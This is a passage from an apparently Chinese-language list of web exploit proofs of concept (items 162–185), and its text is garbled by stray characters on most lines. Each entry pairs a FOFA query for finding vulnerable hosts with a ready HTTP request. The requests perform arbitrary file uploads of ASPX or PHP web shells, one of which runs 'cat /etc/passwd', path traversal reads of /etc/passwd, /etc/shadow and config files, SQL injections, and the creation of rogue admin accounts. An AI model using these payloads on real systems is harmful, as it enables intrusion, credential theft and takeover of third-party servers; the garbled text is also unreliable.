http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"2 Z U, f7 G$ J2 ]1 `( f
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
2 c, I* ^8 k- Y<soap:Body>
$ Q- H2 `0 x6 l: F5 s$ ?. y<UploadResume xmlns="http://tempuri.org/">
2 H# P4 N7 a( O<ip>1</ip>
2 E2 ~! V7 `* z, \' H' Q/ r<fileName>../../../../dizxdell.aspx</fileName>+ F0 D7 w3 P0 K$ P K: i" d( {1 Y
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow> a u% F* F' i; k3 t: h
<tag>3</tag>5 S, O4 m! ? G5 S2 w, m: z) ]
</UploadResume>( F* G1 d" u* ^$ x( q
</soap:Body>* L7 L2 x: M7 a$ L, B( p
</soap:Envelope>
1 A' I3 e: ?- h- M/ a" K* @6 \) S% ` [3 m* u5 V
2 |5 R: {0 \( m+ V( {+ k
http://x.x.x.x/dizxdell.aspx
* O% X$ w5 @( B0 s5 I$ x1 n* }0 x. k8 k& m# h
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传1 p+ S5 f& ^5 S% C- K5 s$ V5 o
FOFA: app="和丰山海-数字标牌" a4 Z) t; j3 }9 r
POST /QH.aspx HTTP/1.1
# j2 P) F* D; d' o1 z4 [/ w; i. I6 }Host: x.x.x.x
0 b' k1 g @) X' W; H; `" ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
# q7 i) V+ m3 m% ]. AConnection: close* l1 h% _7 X* s& z
Content-Length: 583
' A! d0 t: G V4 y- O2 K' [Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey2 M! c7 W* f% `$ ^6 Y& D# M
Accept-Encoding: gzip
" `; \, f" a! `" K7 F* F) p I$ t
; l- N* h& z/ n/ {------WebKitFormBoundaryeegvclmyurlotuey
1 @# W( k2 z0 o+ wContent-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx") S$ n Z2 ]/ t A& @, K
Content-Type: application/octet-stream
( T' @9 M0 F: h; w8 d- o9 m% t1 f+ P
<% response.write("ujidwqfuuqjalgkvrpqy") %>
' e# D$ Q4 y* S9 [------WebKitFormBoundaryeegvclmyurlotuey) m- |: y6 n/ g+ v/ Z
Content-Disposition: form-data; name="action". d6 I" I6 z! _( s* J+ F
0 Y2 W' y E- {( g
upload
& @& ]7 y) K7 J; W6 e S: }------WebKitFormBoundaryeegvclmyurlotuey( Q4 N# v, ?+ A& _' d ~
Content-Disposition: form-data; name="responderId"9 X$ @! e/ e) f/ g; K
2 z7 {9 S% u2 }' c* N* N/ V% W8 Y/ z
ResourceNewResponder9 m6 B( f D( \4 @. l: v8 \
------WebKitFormBoundaryeegvclmyurlotuey" V( K& z. p" ^
Content-Disposition: form-data; name="remotePath"
, ~+ X; p# S) l" `, j8 g9 C4 s+ |$ `) o; D, J) q, L/ y
/opt/resources
# L' N& e6 V/ F& _0 {% s9 N------WebKitFormBoundaryeegvclmyurlotuey--
0 U g* A5 C8 k4 C7 }+ d. ~1 N7 T+ n) s4 O' D( `8 P! b
- D5 S8 g: E5 F7 Qhttp://x.x.x.x/opt/resources/kjuhitjgk.aspx
/ _( b% Q8 p( T' H6 n O9 L
. }+ U. ^8 g6 u. u163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
" ]6 h3 o' V% V+ `" a9 B3 tFOFA: icon_hash="-795291075"
9 N4 r5 J. Q) cPOST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1) Z: p h# T* B5 m, L) T. Q
Host: x.x.x.x
" w# }1 m. q$ {% e1 o# K' jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
3 u3 z% y& `$ l1 RConnection: close
& R V1 D2 C! h2 x# i/ FContent-Length: 2934 k1 ^ A4 m+ r, F! Z2 a
Accept: */*
5 A7 K0 i+ k" bAccept-Encoding: gzip, deflate
4 G" e! ~4 n6 QAccept-Language: zh-CN,zh;q=0.9
' H6 U5 [9 c9 L* e- C; z: W/ J3 bContent-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod
" ?0 L% q7 o( x
$ c" D% E V7 g' Q5 ^* C' p------iiqvnofupvhdyrcoqyuujyetjvqgocod8 i+ V( V% B" _
Content-Disposition: form-data; name="name"/ J* y5 g3 g0 E" v) x* O3 Y
. j4 x. o; ^( h2 m9 v X
1.php
* f' b- Q' o( u+ Y0 O------iiqvnofupvhdyrcoqyuujyetjvqgocod
6 e. I- }. Q l6 FContent-Disposition: form-data; name="upfile"; filename="1.php"4 ? H+ u$ W% A \( ?% A8 A
Content-Type: image/jpeg
% u2 d6 V( V( [' X# w% s
0 l0 F8 F7 r& t7 F8 orvjhvbhwwuooyiioxega+ w5 C" ` u ^( d
------iiqvnofupvhdyrcoqyuujyetjvqgocod--
2 Y, U. o$ Y; Q% e: h# f! k
; h9 w, O# C6 t; ?3 T! b* i# d; @5 {2 i+ |4 S0 O
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
- W, ]0 U* ~: g0 MFOFA: title="智慧综合管理平台登入"0 f* L+ [2 \" W& f4 \+ k
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1+ n8 g4 g. \" ~4 U+ c* @/ t
Host: x.x.x.x' T* z3 `) C3 o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
1 ^4 I- Q& ~% Q" V" u: l, FContent-Length: 288
/ s$ ^/ p4 {7 W' GAccept: application/json, text/javascript, */*; q=0.018 p1 @5 w) }, \3 z0 t# x
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
% [: V! m+ R& k& e. t0 bConnection: close
% Y; V$ K- f: Y& A& g" b+ [Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
3 h) l: Z/ j2 r' z# vX-Requested-With: XMLHttpRequest$ d$ v) _& i0 I
Accept-Encoding: gzip
- R" D1 [* [) X# t4 |7 u( {- i6 R h3 c. D$ s
------dqdaieopnozbkapjacdbdthlvtlyl5 p$ g( n) u4 T! D8 P# D* m
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"$ u( B$ E3 _7 b5 \5 m* W
Content-Type: image/jpeg
; C }. R; i8 i4 J! z& `5 W8 r+ v$ l
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
. ^* `' w% |6 K------dqdaieopnozbkapjacdbdthlvtlyl--
! Z7 I2 x2 O6 i3 I
) X& x: K. r" t1 u" e& [+ }- N* `5 ^
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
% `& N' U2 S# P" L. @8 m( F
9 R* @! R. V7 G- G$ E1 [. i165. OrangeHRM 3.3.3 SQL 注入
% U' _# ?3 I/ g CCVE-2024-36428
) N" L+ e4 F$ p5 t- |2 iFOFA: app="OrangeHRM-产品"
, x1 z8 f/ q" O u- c2 yURL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))3 B7 O5 T7 [/ r- E9 ?* L6 W2 N
! U" k8 l& o7 K
2 P, N; k% G# M3 \2 K/ t166. 中成科信票务管理平台SeatMapHandler SQL注入
' v- [3 a6 A& w- y" a/ C* X6 DFOFA:body="技术支持:北京中成科信科技发展有限公司"
3 k) w- F" _$ O( j. X* s9 TPOST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
; f0 P4 x2 Q" d% W+ ?Host:
! ^- r% r9 j. b4 M" Y$ r, W8 {Pragma: no-cache: _* B. Y* Q/ M
Cache-Control: no-cache7 T! r7 W! W' v0 `! m9 @3 c: `" I$ g3 F
Upgrade-Insecure-Requests: 1
* `: s/ p6 E/ }. E, ]5 f8 t4 KUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
' v% J, c4 g1 l5 G; ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.76 j ^6 G$ ` y6 D
Accept-Encoding: gzip, deflate& [* V* {) }$ G( A `
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
8 g- {' e& j! s" w8 P- \4 U. sCookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE; S. q5 Z9 t2 N
Connection: close* B4 }/ _4 [0 @* A
Content-Type: application/x-www-form-urlencoded
- v5 v% \! A# n5 j, \Content-Length: 89
9 W: g6 k7 s! B+ R4 p; E% ?5 ^% A) Z% X% c6 _
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE' l4 J2 D2 X z1 s k
' s7 Y) s4 t9 V! l
+ N' O1 A( o5 ?2 J. E/ M167. 精益价值管理系统 DownLoad.aspx任意文件读取
6 {: I, R& s- w! t; T- y7 }FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"/ J/ i& b- u; L3 b
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1; y3 F1 g8 I0 s) B* h; z& {
Host:* C" u) c2 k- a, v7 L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
9 [; U. u, _9 Y3 Y! ?; l8 h2 ZContent-Type: application/x-www-form-urlencoded
" u: j! O0 _7 a( z, |) F; lAccept-Encoding: gzip, deflate0 Y: G8 ^1 B" z4 C+ U! K
Accept: */*
+ h4 a1 z# M6 F$ C( L) hConnection: keep-alive2 g, a, y0 P5 |6 v1 s% F
8 E- C/ B5 O8 V B
; c9 M' R$ o: ?* v' u: h168. 宏景EHR OutputCode 任意文件读取
) X7 U( U2 X$ jFOFA:app="HJSOFT-HCM"
: I) A7 ~5 X; uGET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1/ }! O7 T. c5 b0 ^# U
Host: your-ip
/ `! T4 O C: q% hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36( \( F6 G2 ^ G4 p7 Y
Content-Type: application/x-www-form-urlencoded
; ]) l9 ?% y. p* hConnection: close
- ^6 f' i0 ~7 \$ m3 v0 x
. o& a' c) J9 y8 A( g* m6 a6 u+ Q- i: y& ?+ W
: s# P: i+ Q$ d( m169. 宏景EHR downlawbase SQL注入9 H6 | k: s3 U" L( O% n3 B* `
FOFA:app="HJSOFT-HCM"
4 m4 K0 w: j l! f) b, C5 ~GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.15 Y+ U8 | E3 R u$ r. G
Host: your-ip' u/ o, h8 z% ^$ ~( o- E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
7 Q+ n' f5 Z% X$ c+ _' u* gAccept: */*
, e, z1 y" T5 H# }$ t V7 l3 xAccept-Encoding: gzip, deflate
; |9 J. q! @4 L6 V9 E8 X8 s$ X, QConnection: close
0 J. t, `9 b- U7 P
3 u, G( X" J) }8 z2 G* B& H6 G2 u# @5 r' Y3 J; m
% v4 D& i: r4 Q9 j# `0 n170. 宏景EHR DisplayExcelCustomReport 任意文件读取1 C& N5 K1 ^4 u
FOFA:body="/general/sys/hjaxmanage.js"$ l# Y# F3 e3 F7 `5 m
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
7 g$ u7 H0 c7 zHost: balalanengliang0 K$ [5 N- C4 a5 T( K0 m- J
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
; P; o- q. V4 UContent-Type: application/x-www-form-urlencoded- ^! P6 p7 P, ]$ w
/ o! Z8 [1 ]( n7 K8 Y: M
filename=../webapps/ROOT/WEB-INF/web.xml6 j& e, l# u2 A
8 q$ ~$ b* Q" Q2 m- V
+ h$ E4 C% a9 @5 \171. 通天星CMSV6车载定位监控平台 SQL注入) W# L& P% o" o( E# o, O
FOFA:body="/808gps/"; E% S* _. b9 A$ A4 d8 e1 M
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1! q: {, ~2 N' H( Z+ e, a2 T
Host: your-ip$ v6 L0 g/ o4 p( l
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
; X1 q- L/ q5 @( O- @8 A' S9 L/ \Accept: */*$ p2 [" h9 l, f+ c
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: D! S& O0 j" y: sAccept-Encoding: gzip, deflate
5 K& k) b( T1 K7 m$ GConnection: close
0 f: n$ X! E) E8 f7 ]* L0 }% E
- i9 Y; w' c3 z* i( y3 W: ]: r$ D) l$ b& L' V
+ d1 X0 j) y1 y2 p: K* j172. DT-高清车牌识别摄像机任意文件读取
" e8 G8 r- P1 K3 K# e( A* z; aFOFA:app="DT-高清车牌识别摄像机"
6 m; t! z$ o# L9 J3 c/ K e7 eGET /../../../../etc/passwd HTTP/1.1
) V& T8 G: ?5 B1 p1 qHost: your-ip& R6 q# Z' m [) X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36' K) s* B5 i, B) Y2 _
Accept-Encoding: gzip, deflate
! Z8 E4 F! G J1 I$ [Accept: */*& z, r- u2 Y# q! `2 c, O1 b D& K
Connection: keep-alive- A% R) A6 P: v' C
' f+ S' b( O" U6 S5 r! b5 Z. v
8 h5 f4 L6 H+ j+ E! n% V" }1 p" x+ F H
173. Check Point 安全网关任意文件读取
1 H4 W# o& F0 e/ z; wCVE-2024-24919
* [- ?8 \8 o$ r2 W( N" NFOFA:app="Check_Point-SSL-Network-Extender", G5 M+ W' `$ @" p
POST /clients/MyCRL HTTP/1.1
1 p- A( ~+ y5 L: B! [* O7 _; T. B- v' bHost: your-ip* O' _" C! V, L8 k( G$ E* }
Content-Type: application/x-www-form-urlencoded
" @4 p* u, n! l, d6 M
/ t+ I. B% S+ O" \ o0 e1 uaCSHELL/../../../../../../../etc/shadow
9 t A' p' s+ m& Q% J2 O% ?8 \& P# b0 ]4 E
% }7 q2 h9 a; h; L, J& R5 a
6 E. V% a: h; J2 q, j. W: l174. 金和OA C6 FileDownLoad.aspx 任意文件读取
/ q9 u* m1 R v7 n( XFOFA:app="金和网络-金和OA"# \; Y% @) R, {3 c7 z
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1" d5 ]% I7 f. K, o5 E/ }
Host: your-ip) q9 _- }9 g/ `& d4 z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.368 U" j4 S! c$ | x6 N
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
' t# B1 P# \$ X u7 B# V- g8 rAccept-Encoding: gzip, deflate, br. ~8 d9 H( E9 C3 a+ ?$ N
Accept-Language: zh-CN,zh;q=0.99 @; \ B9 o1 m9 p7 A! Y
Connection: close
+ F$ t9 x' Q( }4 E2 [
7 V4 F: F+ m/ E* j2 r1 h+ `3 k7 [* z6 k) G/ x
+ P9 G9 J. Q; ^6 I+ p% W% o175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
3 r9 H {0 D) @ MFOFA:app="金和网络-金和OA"0 Q' S C- y! S( M8 {6 v4 S
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
; N2 Z, w5 g b' h+ [$ IHost:
+ P3 K' D( }2 f( K# E2 X( ZUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
. q5 F; t3 R8 \2 L; l% Y' t0 ~' ~" MAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8; F1 |' k% x8 z9 ^& ^- Y9 I$ X
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
3 v5 Z1 h3 N( k! ~# ^ j7 `Accept-Encoding: gzip, deflate
- B4 Z9 H: t/ a& t: ]! g0 IConnection: close
. v9 t, j4 H' g: yUpgrade-Insecure-Requests: 1; o' P' G: l9 Z+ X" `! y4 [
, b" o2 \9 @. P1 k6 I& F1 S7 c9 R: {
176. 电信网关配置管理系统 rewrite.php 文件上传
% \5 B; T6 `& z( s. |( BFOFA:body="img/login_bg3.png" && body="系统登录"- u, G! ~) X" A# E
POST /manager/teletext/material/rewrite.php HTTP/1.1% \5 y4 ^8 w u. d, d
Host: your-ip
' f8 s% A2 a! ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.09 Z+ ^' p% Y0 C: D
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
7 {2 d. f, a( YConnection: close
. `3 ^7 d4 R- M% u, n5 t4 K
2 W5 t# Y" A7 ~6 o+ e! c. A2 n------WebKitFormBoundaryOKldnDPT
: g; z, {+ O! OContent-Disposition: form-data; name="tmp_name"; filename="test.php"7 S$ w4 e7 g. t0 u& f1 w
Content-Type: image/png4 U; h2 C3 g: _) v6 c" u$ {$ r+ ]
. Y4 \# C S9 Y. y! E+ `. x. g. K
<?php system("cat /etc/passwd");unlink(__FILE__);?>
3 z- R: b4 f8 }------WebKitFormBoundaryOKldnDPT1 U0 w& r4 q% C/ q7 }
Content-Disposition: form-data; name="uploadtime"" J* y. Y( l- Y P. e" X& Y4 r. u
, q# ^: [$ l+ e% t2 @7 G0 V1 f6 W9 `" a) r
- j7 o% P6 j4 \7 H------WebKitFormBoundaryOKldnDPT--
$ J# R$ i) L1 D5 \/ T5 B5 b! J/ t5 d8 W. Z% Y$ }: [' P
# M$ I: n; X& {
: f$ t: [- _" }177. H3C路由器敏感信息泄露
+ U' B0 z' }$ s2 @/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg5 W c9 y- A/ w( b1 I0 _8 [. h6 C
/userLogin.asp/../actionpolicy_status/../M60.cfg6 P! r- I0 Z6 j' X. q4 f
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
' {8 m3 C4 z6 t9 m- @7 l5 w% S6 U) X/userLogin.asp/../actionpolicy_status/../GR5200.cfg2 V, U ?7 B) Z5 J
/userLogin.asp/../actionpolicy_status/../GR3200.cfg* q7 y4 O) x# E$ C4 X: r
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
( t1 b! } q. ]. v1 H) p! c/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg1 c$ C% u k( \4 ?* M5 S
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg+ W# X1 E8 [2 s5 S
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
! E4 i: x; u1 i& q/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg: {5 j, U! q! @: L. P7 z. T$ H" u
/userLogin.asp/../actionpolicy_status/../ER5200.cfg, q" H% F1 y3 O {$ h) w
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
! F( U" V; [+ V% A* o& J, g7 s& Y/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg# H6 E3 ]7 c5 G4 C
/userLogin.asp/../actionpolicy_status/../ER3260.cfg& {9 Q: d. n( F$ y L/ ~" e! {
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
# d4 H! [$ i5 K8 L/userLogin.asp/../actionpolicy_status/../ER3200.cfg- Q/ G4 z& H, Z! ?# c& ^+ b, U
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/ A8 O# P7 f p( V0 L- c+ U4 e/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
* p7 M; m, J$ e! m. d; I8 d5 h' Q( J/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
& n& D9 e U" A( m! d) T/userLogin.asp/../actionpolicy_status/../ER3100.cfg; W, i3 @+ y; U6 L
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
6 E5 K" j% P6 ^8 Q- q
A0 T p- I7 Z; k" s" b! a/ w
6 {) H7 q- [$ G* ~" r( r178. H3C校园网自助服务系统-flexfileupload-任意文件上传; v9 ?2 z1 F' @0 t
FOFA:header="/selfservice"6 s' n' k& x* A8 _: y' T
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.11 i; e( M6 `. q1 k+ a# P8 h# m
Host:
0 _" x* \" j( k3 S5 XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
2 s% M6 d) ~" nContent-Length: 252# i% }7 g I+ @/ c+ \1 f4 N/ X1 W6 O
Accept-Encoding: gzip, deflate
' V: K1 |" ^% ^' e1 d. ]! sConnection: close
: t) y5 a7 L' m: ]/ ]4 |Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l/ H% U) e; d# \( T- L1 _5 U- F
-----------------aqutkea7vvanpqy3rh2l4 [9 a0 J% b; w* @% g2 |1 a
Content-Disposition: form-data; name="12234.txt"; filename="12234"
5 }6 g% y" ]' IContent-Type: application/octet-stream: K3 O: c. h" U, [9 q- n# ?
Content-Length: 255: I! l# c% e0 H" B4 B
/ E. o, B+ I& I) z
12234
+ V% \3 Q+ p+ G' V8 S1 V-----------------aqutkea7vvanpqy3rh2l--! P8 i+ J% `5 Z- K s! u( C1 ^
6 \0 E) h1 C# K+ w: c
4 i/ n" b8 W7 m3 ~' ~GET /imc/primepush/%2e%2e/flex/12234.txt
' e4 g! `5 g( s$ T$ {% T9 O. u, h& x; B" Q8 U8 [
- K q3 }# Z& s8 Y0 V# c, m179. 建文工程管理系统存在任意文件读取. }1 e1 L$ o0 g! E! Z
POST /Common/DownLoad2.aspx HTTP/1.1
0 Z# s* k6 m8 i1 eHost: {{Hostname}}+ a3 I( V% A I6 ~( r
Content-Type: application/x-www-form-urlencoded! C" \5 l+ n# h: D t+ [
User-Agent: Mozilla/5.0+ {* Q2 ~) t+ q) e8 m$ M) E
/ v0 ^; l8 ]& jpath=../log4net.config&Name=* R' F2 b* d9 Z
3 l0 d0 }+ ]" O( l8 v' [- a. @4 u9 n
180. 帮管客 CRM jiliyu SQL注入
- D7 N% e7 |) o/ n. ?3 r- d9 B3 u5 tFOFA:app="帮管客-CRM"
b6 @- R1 \/ M/ D0 U/ |- oGET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
7 a" H2 ]' Q( nHost: your-ip
% |) N6 i- y) b0 ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
, o8 R$ u7 s! E6 v, w$ K1 ~1 D7 qAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# w$ S1 s; v4 r# m1 F7 w$ n, lAccept-Encoding: gzip, deflate
! D2 F7 k5 c, u q* L. ]) z) oAccept-Language: zh-CN,zh;q=0.9
" o: L8 ]/ Q6 O2 [* w) wConnection: close7 s4 C" a# B2 d4 @& i& J/ e
" U$ T1 y: g& b9 K- m
% E T( L8 o0 v# a$ Z2 R2 S181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入) X2 J4 ~1 z- r3 f2 z5 M
FOFA:"PDCA/js/_publicCom.js"* N3 X9 [9 h0 ~1 L
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
6 s+ o, J6 B! R U) \/ J! S4 k% eHost: your-ip- Y$ J9 j' E% y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
: A/ L/ F" x+ {) H: `Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
4 q l% G. H3 A0 l1 YAccept-Encoding: gzip, deflate, br
, y. C {2 ^: m1 i9 Q, |Accept-Language: zh-CN,zh;q=0.9( }+ B& U* e4 _& e9 k Q! U3 \
Connection: close
& P# N. P9 D+ d5 k- u; NContent-Type: application/x-www-form-urlencoded
" H! H# T: R: X% p" z3 K7 ~4 q2 E3 o e
: N6 V: F" z& k7 raction=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20" [/ l% g( Z* }4 h c: ~
% U3 z. W! x* Y+ r, c
# C- f' {$ J/ |" q
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
( R5 u+ [$ S! {; KFOFA:"PDCA/js/_publicCom.js"
_4 l- \+ S% a P* vPOST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
7 x0 R. M/ u+ BHost: your-ip
m6 v7 O3 h4 g/ u3 n! lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36+ |1 u* A$ e' x$ s* |. `2 w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
: P3 u1 c' I$ h2 }: W6 vAccept-Encoding: gzip, deflate, br
) @# J# m% j* ?- e4 m$ Q. hAccept-Language: zh-CN,zh;q=0.9
6 F- j, H$ V3 K4 m; Z$ ~Connection: close( k3 @# F2 H2 r
Content-Type: application/x-www-form-urlencoded. r- T: m* n7 w! S# ^. r, S& N
/ c% P- W) A0 O% B& h& N
7 t9 A9 U1 o0 tusername=test1234&pwd=test1234&savedays=1
* g6 v4 W% \8 t
5 v! Z, Z Y& Z& s( J$ e! T
1 A3 e; }* r( _3 Q$ N7 s) F4 \183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入8 E/ X6 t) H2 K- U
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"" s* r3 ^6 E) k0 @
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
& A M1 {3 C+ ]Host: your-ip
4 h- n4 [4 h/ [" W \* PUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.361 V9 q& {% ]) v2 |2 j* |8 W. t
Accept-Charset: utf-8
. y% Y; ^, p9 ?+ j' b8 `Accept-Encoding: gzip, deflate% I* q* `3 i) q5 h
Connection: close
3 m* t8 U" Z& E0 O, r* X' \* W/ R5 R5 Z
% ~" m6 K* l/ w
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
) h' S, w i5 P* T8 p( SFOFA:server="SunFull-Webs"
0 g; }3 W2 W$ o' e: t, m. T4 ? GPOST /soap/AddUser HTTP/1.1/ N# b) h( ]- X; g7 j) V
Host: your-ip. o- Q. X% p) {- R: r/ T/ X
Accept-Encoding: gzip, deflate
$ A* |5 r. ^" ^. T- J6 oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0! H) L9 Q" D% a( `
Accept: application/xml, text/xml, */*; q=0.01
! l6 m9 S1 [4 s+ }Content-Type: text/xml; charset=utf-8' [& ^' e1 _* L3 s1 T; v
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# O9 N( I; A6 J# v) U3 nX-Requested-With: XMLHttpRequest
9 _! k' m7 w/ I3 j0 C0 M# t( V F$ z) d0 H: v# ~( {4 J) a
/ H6 J. q5 P& u) ]8 u9 G' m" k6 a
insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')
2 r7 C, Y9 C6 @! K, ^) d- a( o# [2 v7 Q
p3 i4 d& u9 B. L
185. 瑞友天翼应用虚拟化系统SQL注入/ Y9 \/ u8 ^' G+ s
version < 7.0.5.1
